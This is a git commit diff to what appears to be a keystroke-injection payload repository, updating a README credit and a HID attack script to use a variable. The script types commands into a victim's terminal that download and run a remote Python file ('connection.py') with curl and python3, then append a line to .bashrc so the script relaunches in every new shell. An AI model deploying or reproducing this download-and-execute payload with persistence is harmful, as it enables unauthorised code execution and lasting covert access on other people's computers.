Adapted to the use of variables

[+] Vars
[+] Atackmode
pull/652/head
Aleff 2024-06-06 17:00:42 +02:00
parent 1c174be675
commit a11ba126fc
2 changed files with 9 additions and 7 deletions

View File

@ -33,7 +33,7 @@ This payload is intended as a basic reference point for developing payloads on a
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<h2 align="center"> Aleff</h2>
<div align=center>
<table>
<tr>

View File

@ -8,20 +8,22 @@
* REM # |
* REM #######################################################
ATTACKMODE HID
* REM Requirements:
* REM - Internet Connection
QUACK REM VARIABLES
* REM Here you must put your own file link.
PYTHON-SCRIPT-LINK='https://www.example.com/connection.py'
QUACK DELAY 1000
QUACK CTRL-ALT t
QUACK DELAY 2000
* REM Here you must put your own file link. Replace #PYTHON-SCRIPT-LINK with somethign like this https://www.example.com/connection.py
QUACK STRING curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
QUACK STRING curl -o connection.py $PYTHON-SCRIPT-LINK; python3 connection.py; echo \"if ! pgrep -f connection.py >/dev/null; then
QUACK ENTER
QUACK STRING python3 connection.py &
QUACK ENTER
QUACK STRING fi" >> .bashrc; exit
QUACK STRING fi\" >> .bashrc; exit
QUACK ENTER